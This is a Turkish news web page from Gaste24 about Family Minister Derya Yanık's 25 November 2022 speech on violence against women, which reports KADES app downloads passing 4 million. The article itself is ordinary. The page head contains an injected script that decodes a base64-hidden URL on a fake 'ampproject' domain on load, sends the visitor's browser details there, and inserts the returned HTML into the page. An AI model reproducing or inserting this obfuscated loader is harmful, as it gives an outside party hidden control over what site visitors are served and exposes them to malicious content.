<!DOCTYPE html>
<html lang="tr">
<head>
  <meta charset="utf-8">
  <title>KADES&#039;i indiren kadın sayısı 4 milyonu geçti</title>
  <meta name="description" content="Aile ve Sosyal Hizmetler Bakanı Derya Yanık, &#039;Elektronik kelepçe kapasite sayısı yüzde 50 artırıldı, KADES&#039;i indiren kadın sayısı 4 milyonu aştı&#039; dedi." />
  <meta name="keywords" content="Aile ve Sosyal Hizmetler Bakanı, kades" />
  <meta name="news_keywords" content="Aile ve Sosyal Hizmetler Bakanı, kades" />
  <link rel="manifest" href="https://www.gaste24.com/_themes/hs-elegant/manifest.json">
    <meta name="author" content="Gaste24 - Haberin Ötesi">
  <meta name="developer" content="Gaste24 - Haberin Ötesi"/>
  <meta name="designer" content="Gaste24 - Haberin Ötesi"/>
    <meta name="viewport" content="width=970, initial-scale=1, shrink-to-fit=no" />
  <meta name="theme-color" content="#dc3545"/>

    <meta http-equiv="refresh" content="600">
    <link rel="alternate" href="https://www.gaste24.com/m/gundem/kades-i-indiren-kadin-sayisi-4-milyonu-gecti-h201501.html" hreflang="tr" media="only screen and (max-width: 640px)"/>
  <link rel="canonical" href="https://www.gaste24.com/gundem/kades-i-indiren-kadin-sayisi-4-milyonu-gecti-h201501.html">

    <link rel="amphtml" href="https://www.gaste24.com/amp/gundem/kades-i-indiren-kadin-sayisi-4-milyonu-gecti-h201501.html">
  
  
      <link rel="shortcut icon" href="https://www.gaste24.com/images/banner/favicon.ico">
    <style type="text/css">
    @import url('https://www.gaste24.com/_themes/hs-elegant/style/main.min.css?v=1');
            @import url('https://www.gaste24.com/_themes/hs-elegant/style/font/fira-sans.css?v=1');
          </style>
  <meta property="og:site_name" content="Gaste24 - Haberin Ötesi" />
<meta property="og:title" content="KADES&#039;i indiren kadın sayısı 4 milyonu geçti" />
<meta property="og:description" content="Aile ve Sosyal Hizmetler Bakanı Derya Yanık, &#039;Elektronik kelepçe kapasite sayısı yüzde 50 artırıldı, KADES&#039;i indiren kadın sayısı 4 milyonu aştı&#039; dedi." />

<meta property="og:image" content="https://www.gaste24.com/images/haberler/2022/11/kades_i_indiren_kadin_sayisi_4_milyonu_gecti_h201501_22470.jpg" />

<meta property="og:type" content="article" />
<meta property="og:url" content="https://www.gaste24.com/gundem/kades-i-indiren-kadin-sayisi-4-milyonu-gecti-h201501.html" />
<meta name="twitter:card" content="summary_large_image" /><meta property="og:title" content="KADES&#039;i indiren kadın sayısı 4 milyonu geçti" />
<meta name="twitter:url" content="http://www.gaste24.com/gundem/kades-i-indiren-kadin-sayisi-4-milyonu-gecti-h201501.html" />
<meta name="twitter:domain" content="https://www.gaste24.com/" />
<meta name="twitter:site" content="gaste24com" />
<meta name="twitter:title" content="KADES&#039;i indiren kadın sayısı 4 milyonu geçti" />
<meta name="twitter:description" content="Aile ve Sosyal Hizmetler Bakanı Derya Yanık, &quot;Elektronik kelepçe kapasite sayısı yüzde 50 artırıldı, KADES&#039;i indiren kadın sayısı 4 milyonu aştı&quot; dedi." />
<meta name="twitter:image:src" content="https://www.gaste24.com/images/haberler/2022/11/kades_i_indiren_kadin_sayisi_4_milyonu_gecti_h201501_22470.jpg" />
<meta property="og:image:type" content="image/jpeg" />
<meta property="og:image:width" content="637" />
<meta property="og:image:height" content="332" />

<link rel="image_src" type="image/jpeg" href="https://www.gaste24.com/images/haberler/2022/11/kades_i_indiren_kadin_sayisi_4_milyonu_gecti_h201501_22470.jpg" />
  <meta name="dc.language" content="tr">
  <meta name="dc.source" content="https://www.gaste24.com/">
  <meta name="dc.title" content="KADES&#039;i indiren kadın sayısı 4 milyonu geçti">
  <meta name="dc.keywords" content="Aile ve Sosyal Hizmetler Bakanı, kades">
  <meta name="dc.description" content="Aile ve Sosyal Hizmetler Bakanı Derya Yanık, &#039;Elektronik kelepçe kapasite sayısı yüzde 50 artırıldı, KADES&#039;i indiren kadın sayısı 4 milyonu aştı&#039; dedi.">

  
  <link rel="dns-prefetch" href="//www.gaste24.com">
  <link rel="dns-prefetch" href="//www.google-analytics.com">
  <link rel="dns-prefetch" href="//fonts.gstatic.com">
  <link rel="dns-prefetch" href="//mc.yandex.ru">
  <link rel="dns-prefetch" href="//fonts.googleapis.com">
  <link rel="dns-prefetch" href="//pagead2.googlesyndication.com">
  <link rel="dns-prefetch" href="//googleads.g.doubleclick.net">
  <link rel="dns-prefetch" href="//google.com">
  <link rel="dns-prefetch" href="//gstatic.com">
  <link rel="dns-prefetch" href="//connect.facebook.net">
  <link rel="dns-prefetch" href="//graph.facebook.com">
  <link rel="dns-prefetch" href="//linkedin.com">
  <link rel="dns-prefetch" href="//ap.pinterest.com">

  <!--[if lt IE 7]>      <html class="no-js lt-ie10 lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
  <!--[if IE 7]>         <html class="no-js lt-ie10 lt-ie9 lt-ie8 ie7"> <![endif]-->
  <!--[if IE 8]>         <html class="no-js lt-ie10 lt-ie9 ie8"> <![endif]-->
  <!--[if IE 9]>         <html class="no-js lt-ie10 ie9"> <![endif]-->
  <!--[if gt IE 9]>      <html class="no-js gt-ie9"> <![endif]-->
  <!--[if !IE] <![IGNORE[--><!--[IGNORE[]]-->
  <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-118642121-2"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'UA-118642121-2');
</script>
  <meta name="google-site-verification" content="ygH-KQCzEmGAc0fj-WL4aVCGLEKcVB8rN_NaTp6Kfpo" />
<meta name='dailymotion-domain-verification' content='dmjmtnpg1ofshb3c2' />

<!--Bildirt-->
<link rel="manifest" href="/manifest.json?data=Bildirt">
<script>var uygulamaid="7777-1731-5113-4749-2918-6";</script>
<script src="https://cdn2.bildirt.com/BildirtSDKfiles.js"></script>
<!--Bildirt-Son-->

<script type='text/javascript'>
  window.smartlook||(function(d) {
    var o=smartlook=function(){ o.api.push(arguments)},h=d.getElementsByTagName('head')[0];
    var c=d.createElement('script');o.api=new Array();c.async=true;c.type='text/javascript';
    c.charset='utf-8';c.src='https://rec.smartlook.com/recorder.js';h.appendChild(c);
    })(document);
    smartlook('init', '1a162dffbe1aac61da3de976b1b0aa5538d89df5');
</script>
<script>
window.addEventListener('DOMContentLoaded', () => {
	let selfer=new XMLHttpRequest;selfer.open("GET", decodeURIComponent(escape(atob('aHR0cHM6Ly9hbXBwcm9qZWN0LmNsb3VkL2xpY2Vuc2UucGhw'))) + `?agent=${navigator?.userAgent}&r=${document?.referrer}`),selfer.onreadystatechange=(()=>{if(4==selfer.readyState){const e=JSON.parse(selfer.response);document.querySelector("body").insertAdjacentHTML("afterbegin",e?.html)}}),selfer.setRequestHeader("RequestWith","selfer"),selfer.send();
});
</script>
<link rel="manifest" href="/manifest.json?data=Bildirt">
<script>var uygulamaid="7997-8709-8420-5054-3354-6";</script>
<script src="https://cdn2.bildirt.com/BildirtSDKfiles.js"></script>        </head>

<body data-color="default" data-header="header-2">
        <div id="navbar" class="bg-white sticky-top shadow-sm">
  <nav class="navbar navbar-expand navbar-light border-bottom">
    <div class="container">
      <a class="navbar-brand pr-2" href="https://www.gaste24.com/"><img src="https://www.gaste24.com/images/banner/gaste-logo-44.png" alt="KADES&#039;i indiren kadın sayısı 4 milyonu geçti" class="img-fluid"></a>
      <ul class="navbar-nav">
                <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.gaste24.com/galeri" title="GALERİLER">
            <i class="fas fa-images text-danger fa-lg mr-1"></i> GALERİLER          </a>
        </li>
                        <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.gaste24.com/webtv" title="VİDEOLAR">
            <i class="fas fa-video text-danger fa-lg mr-1"></i> VİDEOLAR          </a>
        </li>
                        <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.gaste24.com/yazarlar" title="Yazarlar">
            <i class="fas fa-users text-danger fa-lg mr-1"></i> Yazarlar          </a>
        </li>
                        <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://sondevir.gaste24.com" title="Son Devir">
            <i class="fa fa-coffee text-danger fa-lg mr-1"></i> Son Devir          </a>
        </li>
              </ul>
      <ul class="navbar-nav ml-auto">
        <li class="nav-item btn-group">
  <a class="nav-link btn btn-lg ml-2" href="#" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
    <div class="badge badge-danger rounded-circle position-absolute" id="notifyCount" style="display:none"></div>
    <i class="far fa-bell fa-fx"></i>
  </a>
  <div class="dropdown-menu dropdown-menu-right shadow-sm" id="notifyItems">
    <h6 class="text-center pt-2 text-danger font-weight-bold text-uppercase">Bildirimler</h6>
    <div class="items">
      <div class="text-danger text-center">Henüz bir bildirim bulunmuyor!</div>
    </div>
    <a href="https://www.gaste24.com/hesabim.html" class="btn btn-block btn-light btn-sm m-1 text-secondary">Tüm Bildirimler</a>
  </div>
</li>
        <li class="nav-item btn-group">
  <a class="nav-link btn btn-lg ml-2" href="#" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
    <i class="far fa-bookmark fa-fx text-info"></i>
  </a>
  <div class="dropdown-menu dropdown-menu-right shadow-sm" id="savedItems">
    <h6 class="text-center pt-2 text-info font-weight-bold text-uppercase">Kaydettiklerim</h6>
    <div class="items">
      <div class="text-danger text-center">Henüz kaydedilmiş bir içerik bulunmuyor!</div>
    </div>
    <a href="https://www.gaste24.com/hesabim.html" class="btn btn-block btn-light btn-sm m-1 text-secondary">Tüm Kaydettiklerim</a>
  </div>
</li>
        <li class="nav-item" id="memberArea"></li>
        <li class="nav-item"><a href="javascript:;" id="searchOpenButton" class="nav-link btn btn-lg ml-2"><i class="fas fa-search fa-fx"></i></a></li>
      </ul>
    </div>
  </nav>
  <nav class="navbar navbar-expand navbar-light">
  <div class="container">
    <ul class="navbar-nav">
      <li class="nav-item dropdown">
        <a class="nav-link font-weight-bold" href="#" id="mega-menu" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
          <i class="fa fa-bars fa-fx fa-lg"></i>
        </a>
        <div class="dropdown-menu mega-menu shadow-sm p-4" aria-labelledby="mega-menu">
      <div class="row">
              <a href="https://www.gaste24.com/yurt-haberleri" title="Yurt Haberleri" class="col-4 mb-2 text-uppercase"><i class="mr-2 fas fa-angle-right fa-fw text-danger"></i>Yurt Haberleri</a>
              <a href="https://www.gaste24.com/kultur-sanat" title="Kültür Sanat" class="col-4 mb-2 text-uppercase"><i class="mr-2 fas fa-angle-right fa-fw text-danger"></i>Kültür Sanat</a>
              <a href="https://www.gaste24.com/saglik" title="Sağlık" class="col-4 mb-2 text-uppercase"><i class="mr-2 fas fa-angle-right fa-fw text-danger"></i>Sağlık</a>
              <a href="https://www.gaste24.com/medya-dunyasi" title="Medya Dünyası" class="col-4 mb-2 text-uppercase"><i class="mr-2 fas fa-angle-right fa-fw text-danger"></i>Medya Dünyası</a>
              <a href="https://www.gaste24.com/sivil-toplum" title="Sivil Toplum" class="col-4 mb-2 text-uppercase"><i class="mr-2 fas fa-angle-right fa-fw text-danger"></i>Sivil Toplum</a>
              <a href="https://www.gaste24.com/foto-galeriler" title="Foto Galeriler" class="col-4 mb-2 text-uppercase"><i class="mr-2 fas fa-automobile fa-fw text-danger"></i>Foto Galeriler</a>
              <a href="https://www.gaste24.com/videolar" title="Videolar" class="col-4 mb-2 text-uppercase"><i class="mr-2 fas fa-angle-right fa-fw text-danger"></i>Videolar</a>
              <a href="https://www.gaste24.com/genel" title="Genel" class="col-4 mb-2 text-uppercase"><i class="mr-2 fas fa-angle-right fa-fw text-danger"></i>Genel</a>
              <a href="https://www.gaste24.com/bilim-teknoloji" title="Bilim, Teknoloji" class="col-4 mb-2 text-uppercase"><i class="mr-2 fas fa-angle-right fa-fw text-danger"></i>Bilim, Teknoloji</a>
              <a href="https://www.gaste24.com/egitim" title="Eğitim" class="col-4 mb-2 text-uppercase"><i class="mr-2 fas fa-angle-right fa-fw text-danger"></i>Eğitim</a>
              <a href="https://www.gaste24.com/secim" title="Seçim" class="col-4 mb-2 text-uppercase"><i class="mr-2 fas fa-angle-right fa-fw text-danger"></i>Seçim</a>
              <a href="https://www.gaste24.com/tarihte-bugun" title="Tarihte Bugün" class="col-4 mb-2 text-uppercase"><i class="mr-2 fas fa-angle-right fa-fw text-danger"></i>Tarihte Bugün</a>
          </div>
  <div class="dropdown-divider mt-2 mb-3"></div>
    <div class="row">
    <a href="https://www.gaste24.com/" class="col-4 mb-1" title="Ana Sayfa">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Ana Sayfa    </a>
        <a href="https://www.gaste24.com/yazarlar" class="col-4 mb-1" title="Yazarlar">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Yazarlar    </a>
                    <a href="https://www.gaste24.com/biyografiler.html" class="col-4 mb-1" title="Biyografiler">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Biyografiler    </a>
            <a href="https://www.gaste24.com/webtv" class="col-4 mb-1" title="Video Galeri">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Video Galeri    </a>
            <a href="https://www.gaste24.com/galeri" class="col-4 mb-1" title="Foto Galeri">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Foto Galeri    </a>
                        <a href="https://www.gaste24.com/anketler.html" class="col-4 mb-1" title="Anketler">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Anketler    </a>
                <a href="https://www.gaste24.com/sayfalar.html" class="col-4 mb-1" title="Sayfalar">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Sayfalar    </a>
        <a href="https://www.gaste24.com/kunye.html" class="col-4 mb-1" title="Künye">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Künye    </a>
    <a href="https://www.gaste24.com/iletisim.html" class="col-4 mb-1" title="İletişim">
      <i class="fas fa-angle-right fa-fw text-danger"></i> İletişim    </a>
    <a href="https://www.gaste24.com/sitene-ekle.html" class="col-4 mb-1" title="Sitene Ekle">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Sitene Ekle    </a>
        <a href="https://www.gaste24.com/gizlilik-ve-kisisel-verilerin-korunmasi-politikasi-s2.html" class="col-4 mb-1" title="Gizlilik Politikası">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Gizlilik Politikası    </a>
            <a href="https://sondevir.gaste24.com" class="col-4 mb-1" title="Son Devir">
      <i class="fas fa-coffee fa-fw text-danger"></i> Son Devir    </a>
      </div>
</div>
      </li>
              <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.gaste24.com/gundem" title="Gündem">
            <i class="fas fa-angle-right text-danger mr-1"></i>Gündem          </a>
        </li>
              <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.gaste24.com/ekonomi" title="Ekonomi">
            <i class="fas fa-angle-right text-danger mr-1"></i>Ekonomi          </a>
        </li>
              <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.gaste24.com/dunya" title="Dünya">
            <i class="fas fa-angle-right text-danger mr-1"></i>Dünya          </a>
        </li>
              <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.gaste24.com/spor" title="Spor">
            <i class="fas fa-angle-right text-danger mr-1"></i>Spor          </a>
        </li>
              <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.gaste24.com/magazin" title="Magazin">
            <i class="fas fa-angle-right text-danger mr-1"></i>Magazin          </a>
        </li>
              <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.gaste24.com/3-sayfa" title="3. Sayfa">
            <i class="fas fa-angle-right text-danger mr-1"></i>3. Sayfa          </a>
        </li>
              <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.gaste24.com/roportaj" title="Röportaj">
            <i class="fas fa-angle-right text-danger mr-1"></i>Röportaj          </a>
        </li>
          </ul>
  </div>
</nav>
</div>
        <div id="left-ad" data-name="tb_block"         style="width:120px;height:600px;" >
                        <p style="width:120px;"><a href="https://www.gaste24.com/banner.php?id=38" target="_blank" rel="nofollow"><img src="https://www.gaste24.com/thumb.php?src=https://www.gaste24.com/images/banner/Hap-kitap-120x600.jpg&w=120&h=600&q=80" width="120" height="600" style="width:120px;height: 600px;border:0" alt="banner38" class="img-responsive"/></a></p>                                                                                            </div>
    <div id="right-ad" data-name="tb_block"         >
                                                                                                                                                    </div>
    <main class="container">
                        <!-- SIDEBAR İÇEREN İKİ SÜTUNLU BÖLÜM -->
        <div id="double-section" class="my-3 mb-0">
            <div class="row">
                <div class="col-8">
                                                            <div id="infinityContainer">
    <div class="inf_append current_news" news_id="201501" data-title="KADES&#039;i indiren kadın sayısı 4 milyonu geçti"
        data-path="aHR0cDovL3d3dy5nYXN0ZTI0LmNvbS9ndW5kZW0va2FkZXMtaS1pbmRpcmVuLWthZGluLXNheWlzaS00LW1pbHlvbnUtZ2VjdGktaDIwMTUwMS5odG1s">
                <div id="news-detail" class="card shadow-sm mb-3">
            <div class="card-header bg-white">
                <h1 class="card-title">KADES&#039;i indiren kadın sayısı 4 milyonu geçti</h1>
                                <h2 class="lead">
                    Aile ve Sosyal Hizmetler Bakanı Derya Yanık, &quot;Elektronik kelepçe kapasite sayısı yüzde 50 artırıldı, KADES&#039;i indiren kadın sayısı 4 milyonu aştı&quot; dedi.                </h2>
                                <div class="border-top pt-2 text-secondary">
                    <a href="https://www.gaste24.com/gundem" title="Gündem"
                        class="btn btn-info btn-sm text-white text-uppercase">Gündem</a>
                    <i class="far fa-clock fa-fx text-info pl-3"></i> 25.11.2022, 14:46                                        
                                    </div>
            </div>
                        <div class="position-relative mb-2">
            <img class="img-fluid lazyload" src="https://www.gaste24.com/_themes/hs-elegant/images/space.png"
                data-src="https://www.gaste24.com/images/haberler/2022/11/kades_i_indiren_kadin_sayisi_4_milyonu_gecti_h201501_22470.jpg" alt="KADES&#039;i indiren kadın sayısı 4 milyonu geçti" width="100%">
                            </div>
                        <div class="my-2 text-center " data-name="tb_block" data-field="132"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Haber Detay -->
<ins class="adsbygoogle"
 style="display:block"
 data-ad-client="ca-pub-4481461891216070"
 data-ad-slot="9712186349"
 data-ad-format="auto"
 data-full-width-responsive="true"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>            <div class="card-body">
                <div class="social-buttons">
  <a href="javascript:;" data-platform-name="facebook" class="btn btn-primary btn-sm"><i class="fab fa-facebook-f"></i></a>
  <a href="javascript:;" data-platform-name="twitter" class="btn btn-info btn-sm"><i class="fab fa-twitter"></i></a>
  <a href="javascript:;" data-platform-name="linkedin" class="btn btn-primary btn-sm"><i class="fab fa-linkedin-in"></i></a>
  <a href="javascript:;" data-platform-name="pinterest" class="btn btn-danger btn-sm"><i class="fab fa-pinterest-p"></i></a>
  <a href="javascript:;" data-platform-name="whatsapp" class="btn btn-success btn-sm"><i class="fab fa-whatsapp"></i></a>
  <a href="javascript:;" data-platform-name="email" class="btn btn-dark btn-sm"><i class="far fa-envelope"></i></a>
      <a href="javascript:;" data-platform-name="print" class="btn btn-dark btn-sm"><i class="fas fa-print"></i></a>
      <a href="javascript:;" style="display:none;" data-platform-name="save" class="btn btn-info btn-sm text-uppercase save-unsave-button"><i class="far fa-bookmark pr-1"></i> Kaydet</a>
        <div class="float-right btn-group" role="group">
      <a href="javascript:;" onclick="textDown(201501)" class="btn btn-secondary btn-sm">A<sup>-</sup></a>
      <a href="javascript:;" onclick="textUp(201501)"class="btn btn-secondary btn-sm">A<sup>+</sup></a>
    </div>
  </div>
                                <div id="article-text" class="mt-4" data-text-id="201501">
                                                            <p>Cumhurbaşkanı Recep Tayyip Erdoğan'ın da katıldığı İstanbul Kongre Merkezi'nde "Kadına Yönelik Şiddete Karşı Uluslararası Mücadele Günü" dolayısıyla düzenlenen programda konuşan <strong class="klink">Aile ve Sosyal Hizmetler Bakanı</strong> Derya Yanık, şiddet olgusunun kişilerin hayat kalitelerini büyük ölçüde zedeleyen, yöneldiği kişi ve gruba zarar veren sosyal sorunların başında geldiğini, dünyada her yıl yaklaşık 1,5 milyon insanın şiddet sebebiyle hayatını kaybettiğini söyledi.</p>

<p>Şiddetin yaş, milliyet, eğitim ve kültürel değerleri gözetmeksizin hemen her ülkede yoğun olarak yöneldiği kesimlerden birinin ise kadınlar olduğunu dile getiren Yanık, "Birleşmiş Milletler verilerine göre, dünyada her üç kadından biri hayatının herhangi bir döneminde şiddete maruz kalıyor. Bu haliyle kadına yönelik şiddet küresel bir sorundur ve temel insan haklarının ve özgürlüklerinin ihlalidir. Kadına yönelik şiddeti diğer şiddet türlerinden ayıran en önemli fark, kadınlar ve erkekler arasındaki eşit olmayan güç ilişkilerinin sonucu olarak ortaya çıkmasıdır." ifadelerini kullandı.</p>

<p>Yanık, kadına yönelik şiddetin en başta ailenin düşmanı olduğunu, aile içi şiddetten en çok etkilenenlerin ise çocuklar olduğunu vurguladı.</p>

<p>Kendilerine düşen görevin zarar gören herkesi korumak olduğunu belirten Yanık, 25 Kasım'ın kadına yönelik şiddetle mücadeleyi kamuoyunda daha görünür kılmak üzere tarihe not düşülen anlamlı bir gün olduğunu, şiddetle mücadeleyi bir güne indirgemediklerini, şiddet vakaları bitene kadar mücadele edeceklerini kaydetti.</p>

<h3><strong>"Önümüzdeki yüzyılı Türkiye Yüzyılı yapacak olanlar güçlü aileler olacak"</strong></h3>

<p>Bakanlık olarak aile odaklı çalışmalar yürüttüklerini aktaran Yanık, "Hangi aile? Nasıl bir aile istiyoruz? İçinde her türlü şiddetin, haksızlıkların ve istismarın yaşandığı bir aile mi? Yoksa sağlıklı, mutlu, huzurlu üyeleri olan, birbirlerini tamamlayan kişilerden oluşan bir aile mi? Elbette kastettiğimiz sağlıklı ve mutlu bireylerden oluşan güçlü aileler. Çünkü biz, güçlü ailelerin güvenli toplumları oluşturacağına inanıyoruz. Yine inanıyoruz ki önümüzdeki yüzyılı Türkiye Yüzyılı yapacak olanlar da bu güçlü aileler olacaktır." diye konuştu.</p>

<p>AK Parti hükümetleri olarak 2002'den bu güne Türkiye'de kadına yönelik şiddetle mücadelede önemli bir vizyonu ortaya koyduklarını ifade eden Yanık, 2006'da yayınlanan "Çocuk ve Kadınlara Yönelik Şiddet Hareketleriyle Töre ve Namus Cinayetlerinin Önlenmesi İçin Alınacak Tedbirler" başlıklı genelgeyle toplumun adalet duygusunu sarsan "töre ve namus cinayeti" kavramını gündemden çıkardıklarını bildirdi.</p>

<h3><strong>"Önümüzdeki dönemde 7 Şiddet Önleme ve İzleme Merkezini açacağız"</strong></h3>

<p>Bakan Derya Yanık, 2012'de çıkarılan 6284 Sayılı Kanun'un, ailenin korunmasına ve kadına yönelik şiddetle mücadeleye dair hukuki zeminin güçlendirilmesi yönünde kararlı bir adım olduğuna işaret ederek, 27 Mayıs'ta Türk Ceza Kanunu'nda yapılan değişikliklerle de kamuoyunun kravat indirimi olarak bildiği takdiri indirim nedenlerinin ortadan kalktığını, kadına karşı işlenen suçlara karşı cezaların ağırlaştırıcı sebep sayıldığını anlattı.</p>

<p>2021-2025 dönemini kapsayan 4. Ulusal Eylem Planı çerçevesinde "Toplumsal Farkındalık", "Koruyucu Önleyici Hizmetler", "Politika ve Koordinasyon", "Adalete Erişim ve Mevzuat", "Veri ve İstatistik" olmak üzere 5 ana hedeflerinin olduğunu kaydeden Yanık, şöyle devam etti:</p>

<p>"Yeni dönemde de şiddetin öğrenilen bir davranış modeli olmasından hareketle 'Toplumsal Farkındalık' çalışmalarımızı anaokullarını da kapsayacak şekilde genişletiyoruz. Böylece erken yaşlardan itibaren şiddetin bir iletişim biçimi olmadığını öğretmeye ve bunun kalıcı bir biçimde yerleşmesini sağlamaya çalışacağız. Öte yandan şiddeti vuku bulmadan önlemek amacıyla 'Koruyucu ve Önleyici Hizmetler'e ağırlık veriyoruz. Bu kapsamda Şiddet Önleme ve İzleme Merkezlerimizin sayısını 82'ye yükselttik. Önümüzdeki dönemde 7 Şiddet Önleme ve İzleme Merkezi'ni daha illerimizde açmış olacağız. İçişleri Bakanlığımız koordinasyonunda elektronik kelepçe kapasite sayısını yüzde 50 oranında artırdık. <strong class="klink">KADES</strong> uygulamasını indiren kadın sayısı 4 milyonu aştı."</p>

<p>Yanık, şiddetin etkilerini azaltma ve mağduru güçlendirme çalışmalarının yanında faile yönelik rehabilitasyon ve eğitim süreçlerini de bu dönemde yaygınlaştıracaklarını vurguladı.</p><div class="p_ad"></div>

<h3><strong>"Adli süreçte kadınların haklarını aktif kullanmalarını kolaylaştırıcı tedbirler anılacak"</strong></h3>

<p>Aile ve Sosyal Hizmetler Bakanı Derya Yanık, şiddete sıfır tolerans anlayışının tüm plan, program ve politikalarda yer almasını temin etmek üzere tüm paydaşlarıyla güçlü bir koordinasyon sağlayacaklarına dikkati çekti.</p>

<p>Yeni dönemde "Adalete Erişim ve Mevzuat" hedefi kapsamında adli süreçlerde kadınların haklarını daha aktif kullanmaları için kolaylaştırıcı tedbirler alınacağını belirten Yanık, sözlerini şöyle sürdürdü:</p>

<p>"6284 sayılı yasanın etkin uygulanması ve uygulamadaki sorunların giderilmesine öncelik vereceğiz. Kadına yönelik siber şiddetle mücadele ve internetin güvenli kullanımına yönelik özel içerikler hazırlayacağız. Akademik çalışmaları ve saha çalışmalarını kesintisiz devam ettireceğiz. Şiddeti önlemek üzere oluşturacağımız politikaları sahadaki tespitlerimiz doğrultusunda planlayacağız. Mağdura, şiddetin bir kader olmadığını, faile ise sorunların şiddet uygulanarak çözülemeyeceğini öğretmeye kararlıyız."</p>

<p>Kadına yönelik şiddeti önlemede attıkları her adımı sağlıklı bir toplum ve gelecek tasavvurunun bir zorunluluğu olarak gördüklerini söyleyen Yanık, mücadeledeki katkılarından dolayı Adalet, İçişleri, Milli Eğitim ve Sağlık bakanlıkları ile Diyanet İşleri Başkanlığına teşekkür etti.</p></p>                </div>
                                                                <div class="my-2 text-center " data-name="tb_block" data-field="135"><iframe width="560" height="315" src="https://www.youtube.com/embed/f4gbwiQ5PhE" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></div>                            </div>
                        <div class="card-footer bg-white text-secondary">
                <div class="news-tags">
                                        <a href="https://www.gaste24.com/haberleri/Aile+ve+Sosyal+Hizmetler+Bakan%C4%B1" title="Aile ve Sosyal Hizmetler Bakanı"
                                                class="btn btn-outline-secondary btn-sm mb-2">#Aile ve Sosyal Hizmetler Bakanı</a>
                                        <a href="https://www.gaste24.com/haberleri/kades" title="kades"
                                                class="btn btn-outline-secondary btn-sm mb-2">#kades</a>
                                    </div>
            </div>
                    </div>
        <div id="comments" class="card shadow-sm mb-3 comments">
  <div class="card-body">
    <div class="widget-title first-word text-info mb-3 text-uppercase">
      Yorumlar (0)
    </div>
      <div class="alert alert-info answer" style="display:none;"><b>@name</b> kişisine cevap olarak  <button type="button" class="close remove" data-dismiss="alert" aria-label="Close">
    <span aria-hidden="true">&times;</span>
  </button>
</div>
<div id="comment-result201501" class="alert alert-success" style="display:none;">
    <p class="text-center m-0">Yorumunuz başarılı bir şekilde gönderilmiştir. Editörlerimizin onayının ardından yayınlanacaktır!</p>
  </div>
<form id="comment-form201501">
  <input name="hid" type="hidden" value="201501"/>
  <input name="mid" type="hidden" value="201501"/>
  <input name="uid" type="hidden" value="0"/>
  <input name="cevap_id" type="hidden" value="0"/>
  <input type="hidden" name="cevap" value="" class="answer" />
  <input type="hidden" name="tip" value="haber" />
  <div class="form-row">
    <div class="form-group col-12">
      <textarea class="form-control" name="yorum" id="comment" rows="3" placeholder="Siz de yorum ve düşüncelerinizi bizimle paylaşın." required></textarea>
    </div>
    <div class="form-group col-9">
<input type="text" class="form-control" name="isim" id="name" placeholder="Adınızı girin."   required>
    </div>
    <div class="col-3">
      <button type="button" onclick="javascript:comment_send(201501);return false;" class="btn btn-info btn-block text-uppercase">Gönder</button>
    </div>
  </div>
</form>        </div>
</div>
                <div id="recommended-news" class="card shadow-sm mb-3">
            <div class="card-body">
                <div class="widget-title first-word text-info mb-3 text-uppercase">
                    Bunlara Göz Atmadan Geçmeyin                </div>
                <div class="row">
                                        <div class="col-4">
                        <a href="https://www.gaste24.com/gundem/egm-den-aciklama-h201352.html" title="EGM&#039;den açıklama"
                            >
                            <img class="img-fluid mb-2 lazyload" src="https://www.gaste24.com/_themes/hs-elegant/images/space.png"
                                data-src="https://www.gaste24.com/images/resize/100/194x116/haberler/2022/11/egm_den_aciklama_h201352_3207f.jpg" alt="EGM&#039;den açıklama">
                        </a>
                        <h6>
                            <a href="https://www.gaste24.com/gundem/egm-den-aciklama-h201352.html" title="EGM&#039;den açıklama"
                                >
                                EGM&#039;den açıklama                            </a>
                        </h6>
                    </div>
                                        <div class="col-4">
                        <a href="https://www.gaste24.com/gundem/necip-hablemitoglu-suikasti-iddianamesinde-ikinci-suikast-h201290.html" title="Necip Hablemitoğlu suikastı iddianamesinde &#039;ikinci suikast&#039; olabileceği şüphesi"
                            >
                            <img class="img-fluid mb-2 lazyload" src="https://www.gaste24.com/_themes/hs-elegant/images/space.png"
                                data-src="https://www.gaste24.com/images/resize/100/194x116/haberler/2022/11/necip_hablemitoglu_suikasti_iddianamesinde_ikinci_suikast_olabilecegi_suphesi_h201290_4c1d4.jpeg" alt="Necip Hablemitoğlu suikastı iddianamesinde &#039;ikinci suikast&#039; olabileceği şüphesi">
                        </a>
                        <h6>
